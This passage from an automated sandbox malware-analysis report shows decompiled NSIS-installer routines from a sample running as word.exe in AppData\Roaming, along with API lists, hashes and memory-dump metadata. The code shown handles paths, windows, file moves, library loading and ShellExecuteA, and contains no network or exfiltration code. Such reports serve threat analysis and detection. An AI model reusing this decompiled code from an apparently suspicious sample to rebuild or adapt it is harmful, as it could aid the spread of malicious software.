                                                          • SetWindowTextA.USER32(?,00417090), ref: 00402C3C
                                                          • SetDlgItemTextA.USER32(?,00000406,00417090), ref: 00402C49
                                                          • ShowWindow.USER32(?,00000005), ref: 00402C51
                                                          • wsprintfA.USER32 ref: 00402C67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: TextWindowwsprintf$ItemShowTimer
                                                          • String ID: ... %d%%
                                                          • API String ID: 2110197580-2449383134
                                                          • Opcode ID: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                                                          • Instruction ID: 99e2debb18c7311ff8eca1142aa4f476a7479ee74c8687a77fe961922a259f3d
                                                          • Opcode Fuzzy Hash: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                                                          • Instruction Fuzzy Hash: FC1186347443197BE2249B249D49FAB779CEB49754F004036FE49F63D1D7B8AC4086AD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D03(CHAR* _a4) {
                                                          				char _t5;
                                                          				char _t7;
                                                          				char* _t15;
                                                          				char* _t16;
                                                          				CHAR* _t17;
                                                          
                                                          				_t17 = _a4;
                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                          					_t17 =  &(_t17[4]);
                                                          				}
                                                          				if( *_t17 != 0 && E00405654(_t17) != 0) {
                                                          					_t17 =  &(_t17[2]);
                                                          				}
                                                          				_t5 =  *_t17;
                                                          				_t15 = _t17;
                                                          				_t16 = _t17;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((char*)(E00405612("*?|<>/\":", _t5))) == 0) {
                                                          							E0040578C(_t16, _t17, CharNextA(_t17) - _t17);
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						_t17 = CharNextA(_t17);
                                                          						_t5 =  *_t17;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, _t16);
                                                          					_t7 =  *_t16;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                          					if(_t15 < _t16) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}









                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 589700163-2943609387
                                                          • Opcode ID: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                                                          • Instruction ID: 5656e1994ff3a00564090885ccfb713e68030b48685137941c4d6139e5eb1e54
                                                          • Opcode Fuzzy Hash: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                                                          • Instruction Fuzzy Hash: 8E11BF61804E9529FB3216385C48B7B7FD8CF67760F18847BE8C5722C2D67C5C829A6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00403F5C(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t35;
                                                          				long _t37;
                                                          				void* _t40;
                                                          				long* _t49;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L15:
                                                          					return 0;
                                                          				}
                                                          				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                          				if(_t49 == 0) {
                                                          					goto L15;
                                                          				}
                                                          				_t35 =  *_t49;
                                                          				if((_t49[5] & 0x00000002) != 0) {
                                                          					_t35 = GetSysColor(_t35);
                                                          				}
                                                          				if((_t49[5] & 0x00000001) != 0) {
                                                          					SetTextColor(_a8, _t35);
                                                          				}
                                                          				SetBkMode(_a8, _t49[4]);
                                                          				_t37 = _t49[1];
                                                          				_v16.lbColor = _t37;
                                                          				if((_t49[5] & 0x00000008) != 0) {
                                                          					_t37 = GetSysColor(_t37);
                                                          					_v16.lbColor = _t37;
                                                          				}
                                                          				if((_t49[5] & 0x00000004) != 0) {
                                                          					SetBkColor(_a8, _t37);
                                                          				}
                                                          				if((_t49[5] & 0x00000010) != 0) {
                                                          					_v16.lbStyle = _t49[2];
                                                          					_t40 = _t49[3];
                                                          					if(_t40 != 0) {
                                                          						DeleteObject(_t40);
                                                          					}
                                                          					_t49[3] = CreateBrushIndirect( &_v16);
                                                          				}
                                                          				return _t49[3];
                                                          			}









                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                                                          • Instruction ID: de1dc0ced46b62e01148019097b19380805317e3bca555cad6edf46d623340dd
                                                          • Opcode Fuzzy Hash: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                                                          • Instruction Fuzzy Hash: C6218471904745ABC7219F68DD08B5BBFF8AF01714F048969F995F22E0D738E904CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E00404E9F(CHAR* _a4, CHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				CHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				CHAR* _t26;
                                                          				signed int _t27;
                                                          				CHAR* _t28;
                                                          				long _t29;
                                                          				signed int _t39;
                                                          
                                                          				_t26 =  *0x423704;
                                                          				_v8 = _t26;
                                                          				if(_t26 != 0) {
                                                          					_t27 =  *0x409250; // 0x6
                                                          					_v12 = _t27;
                                                          					_t39 = _t27 & 0x00000001;
                                                          					if(_t39 == 0) {
                                                          						E00405B16(0, _t39, 0x41fd08, 0x41fd08, _a4);
                                                          					}
                                                          					_t26 = lstrlenA(0x41fd08);
                                                          					_a4 = _t26;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) != 0) {
                                                          							_t26 = SetWindowTextA( *0x4236e8, 0x41fd08);
                                                          						}
                                                          						if((_v12 & 0x00000002) != 0) {
                                                          							_v32 = 0x41fd08;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t39;
                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t39 != 0) {
                                                          							_t28 = _a4;
                                                          							 *((char*)(_t28 + 0x41fd08)) = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                          						if(_t26 < 0x800) {
                                                          							_t26 = lstrcatA(0x41fd08, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t26;
                                                          			}


















                                                          APIs
                                                          • lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                          • lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                          • lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                          • SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                          • SendMessageA.USER32 ref: 00404F33
                                                          • SendMessageA.USER32 ref: 00404F4D
                                                          • SendMessageA.USER32 ref: 00404F5B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                                                          • Instruction ID: 494233230377309a29c5d7fe1475590ec4db79cf9780f6ff06810452207601d7
                                                          • Opcode Fuzzy Hash: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                                                          • Instruction Fuzzy Hash: A021A1B1D00109BBDB119FA5DC859DEBFB9EF85354F14807AFA04B6290C3395E41CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E0040164D() {
                                                          				int _t18;
                                                          				void* _t28;
                                                          				void* _t35;
                                                          
                                                          				 *(_t35 + 8) = E00402A85(0xffffffd0);
                                                          				 *(_t35 - 8) = E00402A85(0xffffffdf);
                                                          				E00405AF4(0x4097f8,  *(_t35 + 8));
                                                          				_t18 = lstrlenA( *(_t35 - 8));
                                                          				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
                                                          					lstrcatA(0x4097f8, 0x40901c);
                                                          					lstrcatA(0x4097f8,  *(_t35 - 8));
                                                          				}
                                                          				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
                                                          					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405D9C( *(_t35 + 8)) == 0) {
                                                          						 *((intOrPtr*)(_t35 - 4)) = 1;
                                                          					} else {
                                                          						_push( *(_t35 - 8));
                                                          						_push( *(_t35 + 8));
                                                          						E00405842();
                                                          						_push(0xffffffe4);
                                                          						goto L7;
                                                          					}
                                                          				} else {
                                                          					_push(0xffffffe3);
                                                          					L7:
                                                          					E00401423();
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}






                                                          APIs
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401672
                                                          • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040167C
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401691
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,?,C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040169A
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                            • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                            • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                            • Part of subcall function 00405842: CloseHandle.KERNEL32(00000000), ref: 0040588F
                                                            • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 00405898
                                                            • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 004058B5
                                                            • Part of subcall function 00405842: wsprintfA.USER32 ref: 004058D3
                                                            • Part of subcall function 00405842: GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                                                            • Part of subcall function 00405842: GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                                                            • Part of subcall function 00405842: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                                                          • MoveFileA.KERNEL32(?,?), ref: 004016A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$CloseErrorFindModeNamePathShortlstrcatlstrlen$AllocFirstGlobalHandleMoveReadSizelstrcpynwsprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3481313339-2935972921
                                                          • Opcode ID: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                                                          • Instruction ID: e3d936c7b2e8568bf3afc9a15eb44f15e117e5a8b541455a4ce6046f775872e9
                                                          • Opcode Fuzzy Hash: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                                                          • Instruction Fuzzy Hash: 9D119E31A04104BBCF01BFA1CD0899E3A72EF40354F14463BF801B61E6DA7D8A929A4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040476E(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}














                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                                                          • Instruction ID: 9f845b30ae688ed4ef755a08d3db5d44298bc8acb818865eb6350a94e1b176cf
                                                          • Opcode Fuzzy Hash: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                                                          • Instruction Fuzzy Hash: A5015275D00219BADB10DBA4DC85BFFBBBCAB55B15F10412BBB00B72C0D7B469418BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E00401FAB(int __ebx) {
                                                          				int _t28;
                                                          				struct HINSTANCE__* _t33;
                                                          				CHAR* _t35;
                                                          				intOrPtr* _t36;
                                                          				void* _t37;
                                                          
                                                          				_t28 = __ebx;
                                                          				 *(_t37 - 4) = 1;
                                                          				SetErrorMode(0x8001);
                                                          				if( *0x423fd4 < __ebx) {
                                                          					_push(0xffffffe7);
                                                          					goto L14;
                                                          				} else {
                                                          					_t35 = E00402A85(0xfffffff0);
                                                          					 *(_t37 + 8) = E00402A85(1);
                                                          					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                          						L3:
                                                          						_t33 = LoadLibraryExA(_t35, _t28, 8);
                                                          						if(_t33 == _t28) {
                                                          							_push(0xfffffff6);
                                                          							L14:
                                                          							E00401423();
                                                          						} else {
                                                          							goto L4;
                                                          						}
                                                          					} else {
                                                          						_t33 = GetModuleHandleA(_t35);
                                                          						if(_t33 != __ebx) {
                                                          							L4:
                                                          							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                          							if(_t36 == _t28) {
                                                          								E00404E9F(0xfffffff7,  *(_t37 + 8));
                                                          							} else {
                                                          								 *(_t37 - 4) = _t28;
                                                          								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                          									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x424000, 0x40a7f8, 0x409000);
                                                          								} else {
                                                          									E00401423( *((intOrPtr*)(_t37 - 0x1c)));
                                                          									if( *_t36() != 0) {
                                                          										 *(_t37 - 4) = 1;
                                                          									}
                                                          								}
                                                          							}
                                                          							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                          								FreeLibrary(_t33);
                                                          							}
                                                          						} else {
                                                          							goto L3;
                                                          						}
                                                          					}
                                                          				}
                                                          				SetErrorMode(_t28);
                                                          				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
                                                          				return 0;
                                                          			}








                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00401FB6
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FE0
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FF0
                                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00402000
                                                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402059
                                                          • SetErrorMode.KERNEL32 ref: 0040206D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 1609199483-0
                                                          • Opcode ID: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                                                          • Instruction ID: 895be71df4ac45a5aeeb3ddaf5be92ea7e9d143a6a7ef1567a24186397f5d55d
                                                          • Opcode Fuzzy Hash: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                                                          • Instruction Fuzzy Hash: E4210B31D04315EBCB207FA5DE8C95F7A70AB45354B20413BF611B22E0CBBC4A82DA5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040567B(char _a4) {
                                                          				CHAR* _t3;
                                                          				char* _t5;
                                                          				CHAR* _t7;
                                                          				CHAR* _t8;
                                                          				void* _t10;
                                                          
                                                          				_t1 =  &_a4; // 0x40543a
                                                          				_t8 =  *_t1;
                                                          				_t7 = CharNextA(_t8);
                                                          				_t3 = CharNextA(_t7);
                                                          				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                          					if( *_t8 != 0x5c5c) {
                                                          						L8:
                                                          						return 0;
                                                          					}
                                                          					_t10 = 2;
                                                          					while(1) {
                                                          						_t10 = _t10 - 1;
                                                          						_t5 = E00405612(_t3, 0x5c);
                                                          						if( *_t5 == 0) {
                                                          							goto L8;
                                                          						}
                                                          						_t3 = _t5 + 1;
                                                          						if(_t10 != 0) {
                                                          							continue;
                                                          						}
                                                          						return _t3;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					return CharNextA(_t3);
                                                          				}
                                                          			}








                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: :T@$C:\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 3213498283-17942376
                                                          • Opcode ID: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                                                          • Instruction ID: 378ecf4657a12380a446d3b042b521289e3ad6747402889725e3da158347204d
                                                          • Opcode Fuzzy Hash: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                                                          • Instruction Fuzzy Hash: 2DF02751A10F215AEB2222644C54B7B6BACDB55320F440C37E544F61E0C3BD4C92CFAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E00401E0E() {
                                                          				signed int _t7;
                                                          				void* _t19;
                                                          				char* _t20;
                                                          				signed int _t24;
                                                          				void* _t26;
                                                          
                                                          				_t24 = E00402A85(_t19);
                                                          				_t20 = E00402A85(0x31);
                                                          				_t7 = E00402A85(0x22);
                                                          				_push(_t20);
                                                          				_push(_t24);
                                                          				_t22 = _t7;
                                                          				wsprintfA("C:\Users\Albus\AppData\Local\Temp", "%s %s");
                                                          				E00401423(0xffffffec);
                                                          				asm("sbb eax, eax");
                                                          				asm("sbb eax, eax");
                                                          				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\Albus\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
                                                          					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t26 - 4));
                                                          				return 0;
                                                          			}









                                                          APIs
                                                          • wsprintfA.USER32 ref: 00401E34
                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E62
                                                          Strings
                                                          • %s %s, xrefs: 00401E28
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E2D
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E4D
                                                          Similarity
                                                          • API ID: ExecuteShellwsprintf
                                                          • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 2956387742-4169097713
                                                          • Opcode ID: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
